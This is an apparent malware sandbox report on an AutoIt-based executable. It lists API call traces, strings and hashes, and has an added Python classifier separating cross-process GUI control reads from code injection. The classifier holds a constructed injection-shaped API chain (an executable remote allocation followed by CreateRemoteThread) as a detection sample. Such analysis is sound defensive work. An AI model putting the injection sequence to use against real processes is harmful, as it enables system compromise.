  • Part of subcall function 000F01F8: LeaveCriticalSection.KERNEL32(001A070C,?,000E8747,001A2514), ref: 000F0235
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
• String ID: 5$G$Variable must be of type 'Object'.
• API String ID: 535116098-3733170431
• Opcode ID: 7db2a530919fc4203770dfe3bc1cadbbebf7acdbfe9a8103be20689cf7606ffc
• Instruction ID: 8dc3972f0207abebda786764e70cae6c770eac8959c4490f79f7d1f99b45ef65
• Opcode Fuzzy Hash: 7db2a530919fc4203770dfe3bc1cadbbebf7acdbfe9a8103be20689cf7606ffc
• Instruction Fuzzy Hash: A5916D74A04209EFCB04EF94E9929BDB7B1FF45301F108059F826AF292DB71AE49CB51
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: JO
                                                                                                                                                                                                                                          • API String ID: 0-2333933171
                                                                                                                                                                                                                                          • Opcode ID: a56a816ed95738036b07a02ef7f8d63aa47426f8f224cdea0c8a01a284535e9e
                                                                                                                                                                                                                                          • Instruction ID: 779101fdab940df63b36ba780ea77d8421845a4483d01790a85482576815dbf9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a56a816ed95738036b07a02ef7f8d63aa47426f8f224cdea0c8a01a284535e9e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6451CD7190060A9FDB259FA4C949AFFBBBAAF09310F14005AF485A72D2D7B19A01DF61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0013B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001321D0,?,?,00000034,00000800,?,00000034), ref: 0013B42D
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00132760
                                                                                                                                                                                                                                            • Part of subcall function 0013B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0013B3F8
                                                                                                                                                                                                                                            • Part of subcall function 0013B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0013B355
                                                                                                                                                                                                                                            • Part of subcall function 0013B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00132194,00000034,?,?,00001004,00000000,00000000), ref: 0013B365
                                                                                                                                                                                                                                            • Part of subcall function 0013B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00132194,00000034,?,?,00001004,00000000,00000000), ref: 0013B37B
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001327CD
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0013281A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 80a9f5f82d9297ef3f013558e99c84f01290348bd95e9397d807313a4a091a1a
                                                                                                                                                                                                                                          • Instruction ID: 4bfca624fce1f7783bbd093d6323be238861d479465bc04de7cc758031c141f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80a9f5f82d9297ef3f013558e99c84f01290348bd95e9397d807313a4a091a1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3410C76900218BFDB10DFA4CD85AEEBBB8EF19700F104099FA55B7191DB706E85CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

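The call chain listed for the function above (GetWindowThreadProcessId, OpenProcess with access mask 0x438, VirtualAllocEx with 0x1000/0x04, WriteProcessMemory, SendMessageW with 0x1104 and 0x1111, ReadProcessMemory) is the standard way a Win32 program reads items from a tree-view control that belongs to another process: TVM_GETITEMRECT (0x1104) and TVM_HITTEST (0x1111) take an lParam pointer that must be valid in the control's own address space, so the caller allocates a buffer in the owning process, writes the request there, sends the message and reads the result back. GUI-automation runtimes such as AutoIt do exactly this for their ControlTreeView/ControlListView functions, and the same OpenProcess/VirtualAllocEx/WriteProcessMemory triple is what generic injection heuristics key on. The discriminator is the allocation: 0x04 is PAGE_READWRITE, not an executable mapping, and the chain contains no CreateRemoteThread or thread-context call. The Python below is an added example, not part of the Joe Sandbox report: it parses "APIs" lines in the shape the report prints, resolves the numeric arguments to their Win32 names, and applies that discriminator. The input lines are constructed copies of this record's calls plus a second, constructed, injection-shaped chain for contrast; the arity table and the verdict strings are the example's own assumptions, not report fields.

```python
import re

# Win32 constants (winnt.h, memoryapi.h, commctrl.h); only the ones this example resolves.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXECUTE_MASK = 0xF0  # any PAGE_EXECUTE* value has one of these bits set
TV_FIRST, LVM_FIRST = 0x1100, 0x1000
CONTROL_MESSAGES = {
    TV_FIRST + 4: "TVM_GETITEMRECT", TV_FIRST + 10: "TVM_GETNEXTITEM",
    TV_FIRST + 12: "TVM_GETITEMA", TV_FIRST + 17: "TVM_HITTEST", TV_FIRST + 62: "TVM_GETITEMW",
    LVM_FIRST + 4: "LVM_GETITEMCOUNT", LVM_FIRST + 75: "LVM_GETITEMW", LVM_FIRST + 115: "LVM_GETITEMTEXTW",
}
# Real parameter counts (assumption of this example): the report prints further stack
# slots after the real arguments, and those must not be decoded as parameters.
ARITY = {"OpenProcess": 3, "VirtualAllocEx": 5, "WriteProcessMemory": 5, "ReadProcessMemory": 5,
         "SendMessageW": 4, "GetWindowThreadProcessId": 2, "CreateRemoteThread": 7}

LINE_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]+)")

# Constructed input: the calls of the record above, in the report's own line shape.
TREEVIEW_READ_LINES = [
    "• Part of subcall function 0013B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001321D0,?,?,00000034,00000800,?,00000034), ref: 0013B42D",
    "• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00132760",
    "• Part of subcall function 0013B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0013B3F8",
    "• Part of subcall function 0013B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0013B355",
    "• Part of subcall function 0013B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00132194,00000034,?,?,00001004,00000000,00000000), ref: 0013B365",
    "• Part of subcall function 0013B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00132194,00000034,?,?,00001004,00000000,00000000), ref: 0013B37B",
    "• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001327CD",
    "• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0013281A",
]
# Constructed contrast chain shaped like classic shellcode injection (not from the report).
INJECTION_LINES = [
    "• OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00401000",
    "• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00401020",
    "• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00401040",
    "• CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 00401060",
]


def _arg(token):
    token = token.strip()
    if token == "?":
        return None  # value not recovered by the sandbox
    try:
        return int(token, 16)
    except ValueError:
        return token  # string arguments (file paths, class names) are kept verbatim


def parse_api_line(line):
    """Return {"api", "module", "args", "ref"} for one report line, or None if it is not a call."""
    m = LINE_RE.search(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = [_arg(t) for t in raw_args.split(",")] if raw_args.strip() else []
    return {"api": api, "module": module, "args": args[:ARITY.get(api, len(args))], "ref": ref}


def flags_to_names(value, table):
    """Resolve a bit mask to symbolic names; unknown leftover bits are reported as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([hex(rest)] if rest else [])


def decode_call(call):
    api, a = call["api"], call["args"]
    if api == "OpenProcess" and a and isinstance(a[0], int):
        return {"desired_access": flags_to_names(a[0], PROCESS_ACCESS)}
    if api == "VirtualAllocEx" and len(a) >= 5 and isinstance(a[4], int):
        return {"alloc_type": flags_to_names(a[3], MEM_FLAGS) if isinstance(a[3], int) else None,
                "protect": flags_to_names(a[4], PAGE_PROTECT),
                "executable": bool(a[4] & PAGE_EXECUTE_MASK)}
    if api == "SendMessageW" and len(a) >= 2 and isinstance(a[1], int):
        return {"message": CONTROL_MESSAGES.get(a[1], f"0x{a[1]:04X}")}
    return {}


def classify_chain(lines):
    """Decode every call and decide whether the remote-memory chain looks like injection."""
    calls = [c for c in map(parse_api_line, lines) if c]
    decoded = [decode_call(c) for c in calls]
    apis = {c["api"] for c in calls}
    messages = sorted({d["message"] for d in decoded if "message" in d})
    executable = any(d.get("executable", False) for d in decoded)
    remote_write = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"} <= apis
    control_read = "ReadProcessMemory" in apis and any(m in CONTROL_MESSAGES.values() for m in messages)
    if remote_write and (executable or "CreateRemoteThread" in apis):
        verdict = "code injection candidate"
    elif remote_write and control_read:
        verdict = "cross-process GUI control read"
    elif remote_write:
        verdict = "remote write without executable mapping: review manually"
    else:
        verdict = "no remote-memory chain"
    return {"apis": sorted(apis), "messages": messages, "executable": executable, "verdict": verdict}


if __name__ == "__main__":
    for name, lines in (("report record", TREEVIEW_READ_LINES), ("constructed contrast", INJECTION_LINES)):
        print(name, classify_chain(lines))
```

The verdict is deliberately conservative: an RW allocation plus a TVM_/LVM_ message and a read-back is treated as control access, anything with an executable mapping or a remote thread is escalated, and a remote write that fits neither pattern is handed to the analyst rather than silently cleared.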
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe,00000104), ref: 00101769
• _free.LIBCMT ref: 00101834
• _free.LIBCMT ref: 0010183E
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
• API String ID: 2506810119-377130129
• Opcode ID: e744b4ddb5f3e48218a9c0542d2c0e7a2cb693e641dae39624e1db602a5b7530
• Instruction ID: 63c7b97d054abdf0621c1de3f9d8d711eb82278faf51b1db07272847fd5cb28f
• Opcode Fuzzy Hash: e744b4ddb5f3e48218a9c0542d2c0e7a2cb693e641dae39624e1db602a5b7530
• Instruction Fuzzy Hash: D831A075A40218FBCB21DF999C85D9EBBFCEB95310F20416BF84497291D7B48E40CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0013C306
• DeleteMenu.USER32(?,00000007,00000000), ref: 0013C34C
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001A1990,01095478), ref: 0013C395
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: eca97838b470543b752b58a1600d09ce8513c8523215b034158c337489d1c994
• Instruction ID: 87e5533e97c1f26bc8fca031c41bb4438608d2ccaebab4c11d887d10392f8f89
• Opcode Fuzzy Hash: eca97838b470543b752b58a1600d09ce8513c8523215b034158c337489d1c994
• Instruction Fuzzy Hash: 0D419F712043019FDB24DF25DC84B6ABBE4BF85324F148A1EF9A5A72D1D770E904CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0016CC08,00000000,?,?,?,?), ref: 001644AA
• GetWindowLongW.USER32 ref: 001644C7
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 001644D7
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 3160c73398da08572b476db6d07277e534d1ea5f773544ec7a05c01cfb495896
• Instruction ID: ea8dbc91489dc9b37fcdc3c9ef1309eb31cff5b55ba74fcee99249ad18934a9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3160c73398da08572b476db6d07277e534d1ea5f773544ec7a05c01cfb495896
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A318031210605AFDF219F78DC46BEA7BA9EB09334F204715F975A22E1DB70ECA19B50
Uniqueness

Uniqueness Score: -1.00%

APIs
• Part of subcall function 0015335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00153077,?,?), ref: 00153378
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0015307A
• _wcslen.LIBCMT ref: 0015309B
• htons.WSOCK32(00000000,?,?,00000000), ref: 00153106
Strings
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
• Opcode ID: dd79b425ca4adae2bbd9fe389a5860109e869a0cf96d5b7110714c1c47c5c705
• Instruction ID: 55ad04775c3e6bc16302b9721105262f322adce2c99c91d5389b2770da26dee7
• Opcode Fuzzy Hash: dd79b425ca4adae2bbd9fe389a5860109e869a0cf96d5b7110714c1c47c5c705
• Instruction Fuzzy Hash: D531AF35204305DFCB20CF28C985AAAB7A0EF54399F258059E9358F792DB72EE49C760
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00163F40
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00163F54
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00163F78
Strings
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: d01e5f537f1784d6247b08e3eaaa83c1372704d8f885e642f286f692a222d310
• Instruction ID: c6d60bbe65a2395658929e48d96a261436c792662201ff00d84e2d5f00eb4304
• Opcode Fuzzy Hash: d01e5f537f1784d6247b08e3eaaa83c1372704d8f885e642f286f692a222d310
• Instruction Fuzzy Hash: FE219F32610219BFDF159F90CC46FEA3BB9EF48714F110254FA656B1D0D7B5A9A08BA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00164705
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00164713
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0016471A
Strings
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: 68b98f1ce0f5653603c9db052464ccd888d0984426dc5002f5839953209f7bb3
• Instruction ID: a4190817e6cec6184d978fa579ce84d420d7a7ad6e6f35cc0a78264adcd18e26
• Opcode Fuzzy Hash: 68b98f1ce0f5653603c9db052464ccd888d0984426dc5002f5839953209f7bb3
• Instruction Fuzzy Hash: 3F217FB5600209AFEB10DF64DCD1DB737ADEF5A3A8B040059FA009B3A1CB71EC61CA60
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: _wcslen
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 176396367-2734436370
• Opcode ID: e462d4f1b19a54aac7aced77a0053eec9a4f37e48a93ef9dcf02617c62e0e421
• Instruction ID: aa435082365a746a85956beb27f27709a9eff484b3d5606d8b37f7b5a9548fd5
• Opcode Fuzzy Hash: e462d4f1b19a54aac7aced77a0053eec9a4f37e48a93ef9dcf02617c62e0e421
• Instruction Fuzzy Hash: 6B215B72205611A6C331AB249C03FF773D89F51310F50442BF94A97142EBD1AD92D3E5
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00163840
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00163850
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00163876
Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                          • Opcode ID: e1e3f0f8fadcfb0d1b729d08d729ca8d9c199b8464b6d7f551b90305e2c6a6c5
                                                                                                                                                                                                                                          • Instruction ID: 334082f7babb553bcb0e42cd68b3e8f57c805554093356bc6ad4cd79acac0c64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e3f0f8fadcfb0d1b729d08d729ca8d9c199b8464b6d7f551b90305e2c6a6c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8217C72610218BBEF219F54DC85EFB376EEF89760F118224F9649B190C7B19C6287A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00144A08
                                                                                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00144A5C
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,0016CC08), ref: 00144AD0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                          • String ID: %lu
                                                                                                                                                                                                                                          • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                          • Opcode ID: cdbd663c62b4db96b164a41298bf3b61bdaa5bdd84e1f080bbc2cdfc87ed8559
                                                                                                                                                                                                                                          • Instruction ID: 78fd325d6d3f8ee965bab424fd3f7a701f887f3f428475be457470a7b0151920
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdbd663c62b4db96b164a41298bf3b61bdaa5bdd84e1f080bbc2cdfc87ed8559
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2313575A00209AFDB10DF54C985EAA77F8EF05308F1440A5F909DB362DB71ED45CBA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0016424F
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00164264
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00164271
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                          • Opcode ID: e295f2d06a561350860b7967cc8df1b051940567c1c0b25b571ce280a5e6a82c
                                                                                                                                                                                                                                          • Instruction ID: c48c766e817eeb57a82fa96374921938e6254dbc11861a3e634209faeccd20a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e295f2d06a561350860b7967cc8df1b051940567c1c0b25b571ce280a5e6a82c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF11E331240208BFEF205E28DC46FAB3BACEF95B54F110118FA55E2090D3B1D8619B20
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                            • Part of subcall function 00132DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00132DC5
                                                                                                                                                                                                                                            • Part of subcall function 00132DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00132DD6
                                                                                                                                                                                                                                            • Part of subcall function 00132DA7: GetCurrentThreadId.KERNEL32 ref: 00132DDD
                                                                                                                                                                                                                                            • Part of subcall function 00132DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00132DE4
                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 00132F78
                                                                                                                                                                                                                                            • Part of subcall function 00132DEE: GetParent.USER32(00000000), ref: 00132DF9
                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00132FC3
                                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,0013303B), ref: 00132FEB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
